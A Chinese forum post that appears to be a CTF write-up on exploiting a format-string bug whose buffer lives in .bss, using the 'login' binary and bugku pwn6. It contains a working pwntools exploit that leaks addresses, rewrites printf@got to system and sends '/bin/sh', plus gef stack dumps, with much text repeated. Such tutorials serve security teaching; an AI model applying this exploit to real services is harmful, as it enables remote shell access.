首页
社区
课程
招聘
[原创]攻击格式化字符串在.bss段的程序(bugku-pwn6)
发表于: 2021-5-28 12:47 15324

[原创]攻击格式化字符串在.bss段的程序(bugku-pwn6)

2021-5-28 12:47
15324

login这道题为例,详细讲解下做这种题的思路。

查看保护:

很明显最后的函数中有典型的格式化字符串漏洞:

但buf在.bss段上,所以不能用自动化工具来打:

我们利用字符串格式化漏洞攻击got表,将printf修改成为system,然后之后循环中输入/bin/sh就可以完成利用:

首先查看调用printf时的栈情况:

用这样的字符串可以泄露栈和libc的地址:

之后利用栈中指向栈数据的数据来构造攻击链:

因为要一次性写两个两字节的数据,需要两个地址,自然需要两条链条。构造链条代码如下:

可以看到利用构造的两条链条,printf已经被改成了system,以下是全部脚本:

以及攻击效果:

以bugku平台的pwn6为例,拿到文件后查看下信息:

有pie保护那么需要泄露main,libc的地址。

第一个函数中有缓冲区溢出风险:

而控制循环的变量正好位于其下方:

第二个函数里有格式化字符串漏洞:

尽管程序会对字符串进行移位操作:

并且buf不在栈上:

但如果在栈中构造好两个链条,还是有机会利用这个漏洞劫持printf@got。

第三个函数中有strcpy,存在栈溢出的风险:

可以用来将一些值部署在栈中。

第二个函数开辟了很多栈空间,而且并没有初始化栈空间的值:

这使得部分部署好的值不会被抹去(记得一定要初始化变量)

据此,此题的解题思路如下:

在调试中确定栈中情况:

转到函数二时栈情况如下:

此处笔者选择将栈顶和保存rbp的地址填充为printf@got+2和printf@got。

全部脚本如下:

运行效果:

通过本文中的练习,可以总结以下三点:

dc@ubuntu:~/playground$ file ./login
./login: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=dbbf329da12ebdd87dcae5d032eda61796f7d0c3, stripped
dc@ubuntu:~/playground$ pwn checksec login
[*] '/home/dc/playground/login'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
dc@ubuntu:~/playground$ file ./login
./login: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=dbbf329da12ebdd87dcae5d032eda61796f7d0c3, stripped
dc@ubuntu:~/playground$ pwn checksec login
[*] '/home/dc/playground/login'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
int __cdecl main()
{
  setbuf(stdin, 0);
  setbuf(stdout, 0);
  setbuf(stderr, 0);
  puts("Please input your name: ");
  read(0, byte_804B080, 0xCu);
  puts("Base maybe not easy......");
  return sub_80485E3();
}
int sub_80485E3()
{
  printf("hello, %s", byte_804B080);
  return sub_804854B();
}
int sub_804854B()
{
  puts("Please input your password: ");
  while ( 1 )
  {
    s1[read(0, s1, 0x32u)] = 0;
    if ( !strncmp(s1, "wllmmllw", 8u) )
      break;
    printf("This is the wrong password: ");
    printf(s1);
    puts("Try again!");
  }
  return puts("Login successfully! Have fun!");
}
int __cdecl main()
{
  setbuf(stdin, 0);
  setbuf(stdout, 0);
  setbuf(stderr, 0);
  puts("Please input your name: ");
  read(0, byte_804B080, 0xCu);
  puts("Base maybe not easy......");
  return sub_80485E3();
}
int sub_80485E3()
{
  printf("hello, %s", byte_804B080);
  return sub_804854B();
}
int sub_804854B()
{
  puts("Please input your password: ");
  while ( 1 )
  {
    s1[read(0, s1, 0x32u)] = 0;
    if ( !strncmp(s1, "wllmmllw", 8u) )
      break;
    printf("This is the wrong password: ");
    printf(s1);
    puts("Try again!");
  }
  return puts("Login successfully! Have fun!");
}
printf(s1);
printf(s1);
.bss:0804B0A0 s1              db ?                    ; DATA XREF: sub_804854B+1B↑o
.bss:0804B0A0 s1              db ?                    ; DATA XREF: sub_804854B+1B↑o
printf(s1);
---------after attack--------->
system('/bin/sh');
printf(s1);
---------after attack--------->
system('/bin/sh');
0xffc6a7d0+0x0000: 0x0804b0a0  →  "%42988c%6$hn"     ← $esp
0xffc6a7d4+0x0004: 0x08048dae  →  "wllmmllw"
0xffc6a7d8+0x0008: 0x00000008
0xffc6a7dc+0x000c: 0x080485fb  →   add esp, 0x10
0xffc6a7e0+0x0010: 0x08048dfd  →  "hello, %s"
0xffc6a7e4+0x0014: 0x0804b080  →  0x00006461 ("ad"?)
0xffc6a7e8+0x0018: 0xffc6a7f8  →  0xffc6a808  →  0x00000000     ← $ebp
0xffc6a7ec+0x001c: 0x08048603  →   nop
─────────────────────────────────────────────────────────────── code:x86:32 ────
    0x80485a4                  add    esp, 0x10
    0x80485a7                  sub    esp, 0xc
    0x80485aa                  push   0x804b0a0
 →  0x80485af                  call   0x8048400 <printf@plt>
   ↳   0x8048400 <printf@plt+0>   jmp    DWORD PTR ds:0x804b014
       0x8048406 <printf@plt+6>   push   0x10
       0x804840b <printf@plt+11>  jmp    0x80483d0
       0x8048410 <puts@plt+0>     jmp    DWORD PTR ds:0x804b018
       0x8048416 <puts@plt+6>     push   0x18
       0x804841b <puts@plt+11>    jmp    0x80483d0
─────────────────────────────────────────────────────── arguments (guessed) ────
printf@plt (
   [sp + 0x0] = 0x0804b0a0 "%42988c%6$hn",
   [sp + 0x4] = 0x08048dae "wllmmllw",
   [sp + 0x8] = 0x00000008,
   [sp + 0xc] = 0x080485fb →  add esp, 0x10,
   [sp + 0x10] = 0x08048dfd "hello, %s"
)
─────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "login", stopped 0x80485af in ?? (), reason: BREAKPOINT
───────────────────────────────────────────────────────────────────── trace ────
[#0] 0x80485af → call 0x8048400 <printf@plt>
[#1] 0x8048603 → nop
[#2] 0x8048689 → nop
[#3] 0xf7dc1647 → __libc_start_main()
[#4] 0x8048471 → hlt
────────────────────────────────────────────────────────────────────────────────
gef➤  dereference $esp 20
0xffc6a7d0+0x0000: 0x0804b0a0  →  "%42988c%6$hn"     ← $esp
0xffc6a7d4+0x0004: 0x08048dae  →  "wllmmllw"
0xffc6a7d8+0x0008: 0x00000008
0xffc6a7dc+0x000c: 0x080485fb  →   add esp, 0x10
0xffc6a7e0+0x0010: 0x08048dfd  →  "hello, %s"
0xffc6a7e4+0x0014: 0x0804b080  →  0x00006461 ("ad"?)
0xffc6a7e8+0x0018: 0xffc6a7f8  →  0xffc6a808  →  0x00000000     ← $ebp
0xffc6a7ec+0x001c: 0x08048603  →   nop
0xffc6a7f0+0x0020: 0x08048e20  →  "Base maybe not easy......"
0xffc6a7f4+0x0024: 0x0804b080  →  0x00006461 ("ad"?)
0xffc6a7f8+0x0028: 0xffc6a808  →  0x00000000
0xffc6a7fc+0x002c: 0x08048689  →   nop
0xffc6a800+0x0030: 0xf7f5c3dc  →  0xf7f5d1e0  →  0x00000000
0xffc6a804+0x0034: 0xffc6a820  →  0x00000001
0xffc6a808+0x0038: 0x00000000
0xffc6a80c+0x003c: 0xf7dc1647  →  <__libc_start_main+247> add esp, 0x10
0xffc6a810+0x0040: 0xf7f5c000  →  0x001b2db0
0xffc6a814+0x0044: 0xf7f5c000  →  0x001b2db0
0xffc6a818+0x0048: 0x00000000
0xffc6a81c+0x004c: 0xf7dc1647  →  <__libc_start_main+247> add esp, 0x10
0xffc6a7d0+0x0000: 0x0804b0a0  →  "%42988c%6$hn"     ← $esp
0xffc6a7d4+0x0004: 0x08048dae  →  "wllmmllw"
0xffc6a7d8+0x0008: 0x00000008
0xffc6a7dc+0x000c: 0x080485fb  →   add esp, 0x10
0xffc6a7e0+0x0010: 0x08048dfd  →  "hello, %s"
0xffc6a7e4+0x0014: 0x0804b080  →  0x00006461 ("ad"?)
0xffc6a7e8+0x0018: 0xffc6a7f8  →  0xffc6a808  →  0x00000000     ← $ebp
0xffc6a7ec+0x001c: 0x08048603  →   nop
─────────────────────────────────────────────────────────────── code:x86:32 ────
    0x80485a4                  add    esp, 0x10
    0x80485a7                  sub    esp, 0xc
    0x80485aa                  push   0x804b0a0
 →  0x80485af                  call   0x8048400 <printf@plt>
   ↳   0x8048400 <printf@plt+0>   jmp    DWORD PTR ds:0x804b014
       0x8048406 <printf@plt+6>   push   0x10
       0x804840b <printf@plt+11>  jmp    0x80483d0
       0x8048410 <puts@plt+0>     jmp    DWORD PTR ds:0x804b018
       0x8048416 <puts@plt+6>     push   0x18
       0x804841b <puts@plt+11>    jmp    0x80483d0
─────────────────────────────────────────────────────── arguments (guessed) ────
printf@plt (
   [sp + 0x0] = 0x0804b0a0 "%42988c%6$hn",
   [sp + 0x4] = 0x08048dae "wllmmllw",
   [sp + 0x8] = 0x00000008,
   [sp + 0xc] = 0x080485fb →  add esp, 0x10,
   [sp + 0x10] = 0x08048dfd "hello, %s"
)
─────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "login", stopped 0x80485af in ?? (), reason: BREAKPOINT
───────────────────────────────────────────────────────────────────── trace ────
[#0] 0x80485af → call 0x8048400 <printf@plt>
[#1] 0x8048603 → nop
[#2] 0x8048689 → nop
[#3] 0xf7dc1647 → __libc_start_main()
[#4] 0x8048471 → hlt
────────────────────────────────────────────────────────────────────────────────
gef➤  dereference $esp 20
0xffc6a7d0+0x0000: 0x0804b0a0  →  "%42988c%6$hn"     ← $esp
0xffc6a7d4+0x0004: 0x08048dae  →  "wllmmllw"
0xffc6a7d8+0x0008: 0x00000008
0xffc6a7dc+0x000c: 0x080485fb  →   add esp, 0x10
0xffc6a7e0+0x0010: 0x08048dfd  →  "hello, %s"
0xffc6a7e4+0x0014: 0x0804b080  →  0x00006461 ("ad"?)
0xffc6a7e8+0x0018: 0xffc6a7f8  →  0xffc6a808  →  0x00000000     ← $ebp
0xffc6a7ec+0x001c: 0x08048603  →   nop
0xffc6a7f0+0x0020: 0x08048e20  →  "Base maybe not easy......"
0xffc6a7f4+0x0024: 0x0804b080  →  0x00006461 ("ad"?)
0xffc6a7f8+0x0028: 0xffc6a808  →  0x00000000
0xffc6a7fc+0x002c: 0x08048689  →   nop
0xffc6a800+0x0030: 0xf7f5c3dc  →  0xf7f5d1e0  →  0x00000000
0xffc6a804+0x0034: 0xffc6a820  →  0x00000001
0xffc6a808+0x0038: 0x00000000
0xffc6a80c+0x003c: 0xf7dc1647  →  <__libc_start_main+247> add esp, 0x10
0xffc6a810+0x0040: 0xf7f5c000  →  0x001b2db0
0xffc6a814+0x0044: 0xf7f5c000  →  0x001b2db0
0xffc6a818+0x0048: 0x00000000
0xffc6a81c+0x004c: 0xf7dc1647  →  <__libc_start_main+247> add esp, 0x10
payload1='\n%6$p\n%15$p\n'
payload1='\n%6$p\n%15$p\n'
0xffc6a7f8(栈中)  -0xffc6a808(栈中) -> 栈中(printf@got) -> printf
0xffc6a7f8(栈中)  -0xffc6xxxx(栈中) -> 栈中(printf@got+2
0xffc6a7f8(栈中)  -0xffc6a808(栈中) -> 栈中(printf@got) -> printf
0xffc6a7f8(栈中)  -0xffc6xxxx(栈中) -> 栈中(printf@got+2
def DoubSzWt(number,deviation):
    payload='%'+str(number)+'c%'+str(deviation)+'$hn'
        return payload
gef➤  dereference $esp 15
0xfff4d590+0x0000: 0x0804b0a0  →  "%54700c%6$hn"     ← $esp
0xfff4d594+0x0004: 0x08048dae  →  "wllmmllw"
0xfff4d598+0x0008: 0x00000008
0xfff4d59c+0x000c: 0x080485fb  →   add esp, 0x10
0xfff4d5a0+0x0010: 0x08048dfd  →  "hello, %s"
0xfff4d5a4+0x0014: 0x0804b080  →  0x00006461 ("ad"?)
0xfff4d5a8+0x0018: 0xfff4d5b8  →  0xfff4d5c8  →  0x00000000     ← $ebp
0xfff4d5ac+0x001c: 0x08048603  →   nop
0xfff4d5b0+0x0020: 0x08048e20  →  "Base maybe not easy......"
0xfff4d5b4+0x0024: 0x0804b080  →  0x00006461 ("ad"?)
0xfff4d5b8+0x0028: 0xfff4d5c8  →  0x00000000
0xfff4d5bc+0x002c: 0x08048689  →   nop
0xfff4d5c0+0x0030: 0xf7fb43dc  →  0xf7fb51e0  →  0x00000000
0xfff4d5c4+0x0034: 0xfff4d5e0  →  0x00000001
0xfff4d5c8+0x0038: 0x00000000
 
p.sendafter('Try again!\n',DoubSzWt(stack_addr_0_2-12,6))
 
gef➤  dereference $esp 15
0xfff4d590+0x0000: 0x0804b0a0  →  "%45076c%10$hn"     ← $esp
0xfff4d594+0x0004: 0x08048dae  →  "wllmmllw"
0xfff4d598+0x0008: 0x00000008
0xfff4d59c+0x000c: 0x080485fb  →   add esp, 0x10
0xfff4d5a0+0x0010: 0x08048dfd  →  "hello, %s"
0xfff4d5a4+0x0014: 0x0804b080  →  0x00006461 ("ad"?)
0xfff4d5a8+0x0018: 0xfff4d5b8  →  0xfff4d5ac  →  0x08048603  →   nop      ← $ebp
0xfff4d5ac+0x001c: 0x08048603  →   nop
0xfff4d5b0+0x0020: 0x08048e20  →  "Base maybe not easy......"
0xfff4d5b4+0x0024: 0x0804b080  →  0x00006461 ("ad"?)
0xfff4d5b8+0x0028: 0xfff4d5ac  →  0x08048603  →   nop
0xfff4d5bc+0x002c: 0x08048689  →   nop
0xfff4d5c0+0x0030: 0xf7fb43dc  →  0xf7fb51e0  →  0x00000000
0xfff4d5c4+0x0034: 0xfff4d5e0  →  0x00000001
0xfff4d5c8+0x0038: 0x00000000
 
 
p.sendafter('Try again!\n',DoubSzWt(int('B014',16),10))
 
0xfff4d590+0x0000: 0x0804b0a0  →  "%54716c%6$hn"     ← $esp
0xfff4d594+0x0004: 0x08048dae  →  "wllmmllw"
0xfff4d598+0x0008: 0x00000008
0xfff4d59c+0x000c: 0x080485fb  →   add esp, 0x10
0xfff4d5a0+0x0010: 0x08048dfd  →  "hello, %s"
0xfff4d5a4+0x0014: 0x0804b080  →  0x00006461 ("ad"?)
0xfff4d5a8+0x0018: 0xfff4d5b8  →  0xfff4d5ac  →  0x0804b014  →  0xf7e4a680  →  <printf+0> call 0xf7f20c79     ← $ebp
0xfff4d5ac+0x001c: 0x0804b014  →  0xf7e4a680  →  <printf+0> call 0xf7f20c79
0xfff4d5b0+0x0020: 0x08048e20  →  "Base maybe not easy......"
0xfff4d5b4+0x0024: 0x0804b080  →  0x00006461 ("ad"?)
0xfff4d5b8+0x0028: 0xfff4d5ac  →  0x0804b014  →  0xf7e4a680  →  <printf+0> call 0xf7f20c79
0xfff4d5bc+0x002c: 0x08048689  →   nop
0xfff4d5c0+0x0030: 0xf7fb43dc  →  0xf7fb51e0  →  0x00000000
0xfff4d5c4+0x0034: 0xfff4d5e0  →  0x00000001
0xfff4d5c8+0x0038: 0x00000000
 
p.sendafter('Try again!\n',DoubSzWt(stack_addr_0_2+4,6))
 
0xfff4d590+0x0000: 0x0804b0a0  →  "%45078c%10$hn"     ← $esp
0xfff4d594+0x0004: 0x08048dae  →  "wllmmllw"
0xfff4d598+0x0008: 0x00000008
0xfff4d59c+0x000c: 0x080485fb  →   add esp, 0x10
0xfff4d5a0+0x0010: 0x08048dfd  →  "hello, %s"
0xfff4d5a4+0x0014: 0x0804b080  →  0x00006461 ("ad"?)
0xfff4d5a8+0x0018: 0xfff4d5b8  →  0xfff4d5bc  →  0x08048689  →   nop      ← $ebp
0xfff4d5ac+0x001c: 0x0804b014  →  0xf7e4a680  →  <printf+0> call 0xf7f20c79
0xfff4d5b0+0x0020: 0x08048e20  →  "Base maybe not easy......"
0xfff4d5b4+0x0024: 0x0804b080  →  0x00006461 ("ad"?)
0xfff4d5b8+0x0028: 0xfff4d5bc  →  0x08048689  →   nop
0xfff4d5bc+0x002c: 0x08048689  →   nop
0xfff4d5c0+0x0030: 0xf7fb43dc  →  0xf7fb51e0  →  0x00000000
0xfff4d5c4+0x0034: 0xfff4d5e0  →  0x00000001
0xfff4d5c8+0x0038: 0x00000000
 
p.sendafter('Try again!\n',DoubSzWt(int('B016',16),10))
 
gef➤  dereference $esp 15
0xfff4d590+0x0000: 0x0804b0a0  →  "%48560c%7$hn%14899c%11$hn"     ← $esp
0xfff4d594+0x0004: 0x08048dae  →  "wllmmllw"
0xfff4d598+0x0008: 0x00000008
0xfff4d59c+0x000c: 0x080485fb  →   add esp, 0x10
0xfff4d5a0+0x0010: 0x08048dfd  →  "hello, %s"
0xfff4d5a4+0x0014: 0x0804b080  →  0x00006461 ("ad"?)
0xfff4d5a8+0x0018: 0xfff4d5b8  →  0xfff4d5bc  →  0x0804b016  →  0x0cb0f7e4     ← $ebp
0xfff4d5ac+0x001c: 0x0804b014  →  0xf7e4a680  →  <printf+0> call 0xf7f20c79
0xfff4d5b0+0x0020: 0x08048e20  →  "Base maybe not easy......"
0xfff4d5b4+0x0024: 0x0804b080  →  0x00006461 ("ad"?)
0xfff4d5b8+0x0028: 0xfff4d5bc  →  0x0804b016  →  0x0cb0f7e4
0xfff4d5bc+0x002c: 0x0804b016  →  0x0cb0f7e4
0xfff4d5c0+0x0030: 0xf7fb43dc  →  0xf7fb51e0  →  0x00000000
0xfff4d5c4+0x0034: 0xfff4d5e0  →  0x00000001
0xfff4d5c8+0x0038: 0x00000000
 
payload='%'+str(sys_addr_0_2)+'c%7$hn'+'%'+str(sys_addr_2_4-sys_addr_0_2)+'c%11$hn'
 
gef➤  dereference $esp 15
0xfff4d590+0x0000: 0x0804b0a0  →  "/bin/sh"     ← $esp
0xfff4d594+0x0004: 0x08048dae  →  "wllmmllw"
0xfff4d598+0x0008: 0x00000008
0xfff4d59c+0x000c: 0x080485fb  →   add esp, 0x10
0xfff4d5a0+0x0010: 0x08048dfd  →  "hello, %s"
0xfff4d5a4+0x0014: 0x0804b080  →  0x00006461 ("ad"?)
0xfff4d5a8+0x0018: 0xfff4d5b8  →  0xfff4d5bc  →  0x0804b016  →  0x0cb0f7e3     ← $ebp
0xfff4d5ac+0x001c: 0x0804b014  →  0xf7e3bdb0  →  <system+0> sub esp, 0xc
0xfff4d5b0+0x0020: 0x08048e20  →  "Base maybe not easy......"
0xfff4d5b4+0x0024: 0x0804b080  →  0x00006461 ("ad"?)
0xfff4d5b8+0x0028: 0xfff4d5bc  →  0x0804b016  →  0x0cb0f7e3
0xfff4d5bc+0x002c: 0x0804b016  →  0x0cb0f7e3
0xfff4d5c0+0x0030: 0xf7fb43dc  →  0xf7fb51e0  →  0x00000000
0xfff4d5c4+0x0034: 0xfff4d5e0  →  0x00000001
0xfff4d5c8+0x0038: 0x00000000
def DoubSzWt(number,deviation):
    payload='%'+str(number)+'c%'+str(deviation)+'$hn'
        return payload
gef➤  dereference $esp 15
0xfff4d590+0x0000: 0x0804b0a0  →  "%54700c%6$hn"     ← $esp
0xfff4d594+0x0004: 0x08048dae  →  "wllmmllw"
0xfff4d598+0x0008: 0x00000008
0xfff4d59c+0x000c: 0x080485fb  →   add esp, 0x10
0xfff4d5a0+0x0010: 0x08048dfd  →  "hello, %s"
0xfff4d5a4+0x0014: 0x0804b080  →  0x00006461 ("ad"?)
0xfff4d5a8+0x0018: 0xfff4d5b8  →  0xfff4d5c8  →  0x00000000     ← $ebp
0xfff4d5ac+0x001c: 0x08048603  →   nop
0xfff4d5b0+0x0020: 0x08048e20  →  "Base maybe not easy......"
0xfff4d5b4+0x0024: 0x0804b080  →  0x00006461 ("ad"?)
0xfff4d5b8+0x0028: 0xfff4d5c8  →  0x00000000
0xfff4d5bc+0x002c: 0x08048689  →   nop
0xfff4d5c0+0x0030: 0xf7fb43dc  →  0xf7fb51e0  →  0x00000000
0xfff4d5c4+0x0034: 0xfff4d5e0  →  0x00000001
0xfff4d5c8+0x0038: 0x00000000
 
p.sendafter('Try again!\n',DoubSzWt(stack_addr_0_2-12,6))
 
gef➤  dereference $esp 15
0xfff4d590+0x0000: 0x0804b0a0  →  "%45076c%10$hn"     ← $esp
0xfff4d594+0x0004: 0x08048dae  →  "wllmmllw"
0xfff4d598+0x0008: 0x00000008
0xfff4d59c+0x000c: 0x080485fb  →   add esp, 0x10
0xfff4d5a0+0x0010: 0x08048dfd  →  "hello, %s"
0xfff4d5a4+0x0014: 0x0804b080  →  0x00006461 ("ad"?)
0xfff4d5a8+0x0018: 0xfff4d5b8  →  0xfff4d5ac  →  0x08048603  →   nop      ← $ebp
0xfff4d5ac+0x001c: 0x08048603  →   nop
0xfff4d5b0+0x0020: 0x08048e20  →  "Base maybe not easy......"
0xfff4d5b4+0x0024: 0x0804b080  →  0x00006461 ("ad"?)
0xfff4d5b8+0x0028: 0xfff4d5ac  →  0x08048603  →   nop
0xfff4d5bc+0x002c: 0x08048689  →   nop
0xfff4d5c0+0x0030: 0xf7fb43dc  →  0xf7fb51e0  →  0x00000000
0xfff4d5c4+0x0034: 0xfff4d5e0  →  0x00000001
0xfff4d5c8+0x0038: 0x00000000
 
 
p.sendafter('Try again!\n',DoubSzWt(int('B014',16),10))
 
0xfff4d590+0x0000: 0x0804b0a0  →  "%54716c%6$hn"     ← $esp
0xfff4d594+0x0004: 0x08048dae  →  "wllmmllw"
0xfff4d598+0x0008: 0x00000008
0xfff4d59c+0x000c: 0x080485fb  →   add esp, 0x10
0xfff4d5a0+0x0010: 0x08048dfd  →  "hello, %s"
0xfff4d5a4+0x0014: 0x0804b080  →  0x00006461 ("ad"?)
0xfff4d5a8+0x0018: 0xfff4d5b8  →  0xfff4d5ac  →  0x0804b014  →  0xf7e4a680  →  <printf+0> call 0xf7f20c79     ← $ebp
0xfff4d5ac+0x001c: 0x0804b014  →  0xf7e4a680  →  <printf+0> call 0xf7f20c79
0xfff4d5b0+0x0020: 0x08048e20  →  "Base maybe not easy......"
0xfff4d5b4+0x0024: 0x0804b080  →  0x00006461 ("ad"?)
0xfff4d5b8+0x0028: 0xfff4d5ac  →  0x0804b014  →  0xf7e4a680  →  <printf+0> call 0xf7f20c79
0xfff4d5bc+0x002c: 0x08048689  →   nop
0xfff4d5c0+0x0030: 0xf7fb43dc  →  0xf7fb51e0  →  0x00000000
0xfff4d5c4+0x0034: 0xfff4d5e0  →  0x00000001
0xfff4d5c8+0x0038: 0x00000000
 
p.sendafter('Try again!\n',DoubSzWt(stack_addr_0_2+4,6))
 
0xfff4d590+0x0000: 0x0804b0a0  →  "%45078c%10$hn"     ← $esp
0xfff4d594+0x0004: 0x08048dae  →  "wllmmllw"
0xfff4d598+0x0008: 0x00000008
0xfff4d59c+0x000c: 0x080485fb  →   add esp, 0x10
0xfff4d5a0+0x0010: 0x08048dfd  →  "hello, %s"
0xfff4d5a4+0x0014: 0x0804b080  →  0x00006461 ("ad"?)
0xfff4d5a8+0x0018: 0xfff4d5b8  →  0xfff4d5bc  →  0x08048689  →   nop      ← $ebp
0xfff4d5ac+0x001c: 0x0804b014  →  0xf7e4a680  →  <printf+0> call 0xf7f20c79
0xfff4d5b0+0x0020: 0x08048e20  →  "Base maybe not easy......"
0xfff4d5b4+0x0024: 0x0804b080  →  0x00006461 ("ad"?)
0xfff4d5b8+0x0028: 0xfff4d5bc  →  0x08048689  →   nop
0xfff4d5bc+0x002c: 0x08048689  →   nop
0xfff4d5c0+0x0030: 0xf7fb43dc  →  0xf7fb51e0  →  0x00000000
0xfff4d5c4+0x0034: 0xfff4d5e0  →  0x00000001
0xfff4d5c8+0x0038: 0x00000000
 
p.sendafter('Try again!\n',DoubSzWt(int('B016',16),10))
 
gef➤  dereference $esp 15
0xfff4d590+0x0000: 0x0804b0a0  →  "%48560c%7$hn%14899c%11$hn"     ← $esp
0xfff4d594+0x0004: 0x08048dae  →  "wllmmllw"
0xfff4d598+0x0008: 0x00000008
0xfff4d59c+0x000c: 0x080485fb  →   add esp, 0x10
0xfff4d5a0+0x0010: 0x08048dfd  →  "hello, %s"
0xfff4d5a4+0x0014: 0x0804b080  →  0x00006461 ("ad"?)
0xfff4d5a8+0x0018: 0xfff4d5b8  →  0xfff4d5bc  →  0x0804b016  →  0x0cb0f7e4     ← $ebp
0xfff4d5ac+0x001c: 0x0804b014  →  0xf7e4a680  →  <printf+0> call 0xf7f20c79
0xfff4d5b0+0x0020: 0x08048e20  →  "Base maybe not easy......"
0xfff4d5b4+0x0024: 0x0804b080  →  0x00006461 ("ad"?)
0xfff4d5b8+0x0028: 0xfff4d5bc  →  0x0804b016  →  0x0cb0f7e4
0xfff4d5bc+0x002c: 0x0804b016  →  0x0cb0f7e4
0xfff4d5c0+0x0030: 0xf7fb43dc  →  0xf7fb51e0  →  0x00000000
0xfff4d5c4+0x0034: 0xfff4d5e0  →  0x00000001
0xfff4d5c8+0x0038: 0x00000000
 
payload='%'+str(sys_addr_0_2)+'c%7$hn'+'%'+str(sys_addr_2_4-sys_addr_0_2)+'c%11$hn'
 
gef➤  dereference $esp 15
0xfff4d590+0x0000: 0x0804b0a0  →  "/bin/sh"     ← $esp
0xfff4d594+0x0004: 0x08048dae  →  "wllmmllw"
0xfff4d598+0x0008: 0x00000008
0xfff4d59c+0x000c: 0x080485fb  →   add esp, 0x10
0xfff4d5a0+0x0010: 0x08048dfd  →  "hello, %s"
0xfff4d5a4+0x0014: 0x0804b080  →  0x00006461 ("ad"?)
0xfff4d5a8+0x0018: 0xfff4d5b8  →  0xfff4d5bc  →  0x0804b016  →  0x0cb0f7e3     ← $ebp
0xfff4d5ac+0x001c: 0x0804b014  →  0xf7e3bdb0  →  <system+0> sub esp, 0xc
0xfff4d5b0+0x0020: 0x08048e20  →  "Base maybe not easy......"
0xfff4d5b4+0x0024: 0x0804b080  →  0x00006461 ("ad"?)
0xfff4d5b8+0x0028: 0xfff4d5bc  →  0x0804b016  →  0x0cb0f7e3
0xfff4d5bc+0x002c: 0x0804b016  →  0x0cb0f7e3
0xfff4d5c0+0x0030: 0xf7fb43dc  →  0xf7fb51e0  →  0x00000000
0xfff4d5c4+0x0034: 0xfff4d5e0  →  0x00000001
0xfff4d5c8+0x0038: 0x00000000
from pwn import *
#from LibcSearcher import LibcSearcher
 
#p=remote('108.160.139.79',9090)
 
p=process('./login')
elf=ELF('./login')
libc=ELF('/lib/i386-linux-gnu/libc.so.6')
 
#context.log_level="debug"
p.sendafter('your name: ','ad')
payload1='\n%6$p\n%15$p\n'
p.sendafter('Please input your password: \n',payload1)
 
def DoubSzWt(number,deviation):
    payload='%'+str(number)+'c%'+str(deviation)+'$hn'
        return payload
p.recvuntil('0x')
stack_addr=int(p.recv(8),16)
p.recvuntil('0x')
libc_main_addr=int(p.recv(8),16)-247
print "libc_main_addr=>",hex(libc_main_addr)
'''libc=LibcSearcher('__libc_start_main',libc_main_addr)'''
libc_data=libc_main_addr-libc.symbols['__libc_start_main']
sys_addr=libc_data+libc.symbols['system']#+0x480
#str_sh_addr=libc_data+libc.symbols['str_bin_sh']
str_bin_sh=libc.search("/bin/sh\x00").next()
sys_addr_0_2=int(str(hex(sys_addr))[6:10],16)
sys_addr_2_4=int(str(hex(sys_addr))[2:6],16)
stack_addr_0_2=int(str(hex(stack_addr))[6:10],16)
print "sys_addr=>",hex(sys_addr)
print 'sys_addr_0_2=>',hex(sys_addr_0_2)
print 'sys_addr_2_4=>',hex(sys_addr_2_4)
print 'stack_addr=>',hex(stack_addr)
print 'stack_addr_0_2=>',hex(stack_addr_0_2)
print 'libc_data=>',hex(libc_data)
 
p.sendafter('Try again!\n',DoubSzWt(stack_addr_0_2-12,6))
p.sendafter('Try again!\n',DoubSzWt(int('B014',16),10))
 
p.sendafter('Try again!\n',DoubSzWt(stack_addr_0_2+4,6))
p.sendafter('Try again!\n',DoubSzWt(int('B016',16),10))
'''
gdb.attach(p,'break *0x80485AF\nc')
pause()
'''
# in case sys_addr_2_4 < sys_addr_0_2 will fail
payload='%'+str(sys_addr_0_2)+'c%7$hn'+'%'+str(sys_addr_2_4-sys_addr_0_2)+'c%11$hn'
p.sendafter('Try again!\n',payload)
p.sendafter('Try again!\n','/bin/sh\x00')
 
p.interactive()
from pwn import *
#from LibcSearcher import LibcSearcher
 
#p=remote('108.160.139.79',9090)
 
p=process('./login')
elf=ELF('./login')
libc=ELF('/lib/i386-linux-gnu/libc.so.6')
 
#context.log_level="debug"
p.sendafter('your name: ','ad')
payload1='\n%6$p\n%15$p\n'
p.sendafter('Please input your password: \n',payload1)
 
def DoubSzWt(number,deviation):
    payload='%'+str(number)+'c%'+str(deviation)+'$hn'
        return payload
p.recvuntil('0x')
stack_addr=int(p.recv(8),16)
p.recvuntil('0x')
libc_main_addr=int(p.recv(8),16)-247
print "libc_main_addr=>",hex(libc_main_addr)
'''libc=LibcSearcher('__libc_start_main',libc_main_addr)'''
libc_data=libc_main_addr-libc.symbols['__libc_start_main']
sys_addr=libc_data+libc.symbols['system']#+0x480
#str_sh_addr=libc_data+libc.symbols['str_bin_sh']
str_bin_sh=libc.search("/bin/sh\x00").next()
sys_addr_0_2=int(str(hex(sys_addr))[6:10],16)
sys_addr_2_4=int(str(hex(sys_addr))[2:6],16)
stack_addr_0_2=int(str(hex(stack_addr))[6:10],16)
print "sys_addr=>",hex(sys_addr)
print 'sys_addr_0_2=>',hex(sys_addr_0_2)
print 'sys_addr_2_4=>',hex(sys_addr_2_4)
print 'stack_addr=>',hex(stack_addr)
print 'stack_addr_0_2=>',hex(stack_addr_0_2)
print 'libc_data=>',hex(libc_data)
 
p.sendafter('Try again!\n',DoubSzWt(stack_addr_0_2-12,6))
p.sendafter('Try again!\n',DoubSzWt(int('B014',16),10))
 
p.sendafter('Try again!\n',DoubSzWt(stack_addr_0_2+4,6))
p.sendafter('Try again!\n',DoubSzWt(int('B016',16),10))
'''
gdb.attach(p,'break *0x80485AF\nc')
pause()
'''
# in case sys_addr_2_4 < sys_addr_0_2 will fail
payload='%'+str(sys_addr_0_2)+'c%7$hn'+'%'+str(sys_addr_2_4-sys_addr_0_2)+'c%11$hn'
p.sendafter('Try again!\n',payload)
p.sendafter('Try again!\n','/bin/sh\x00')
 
p.interactive()
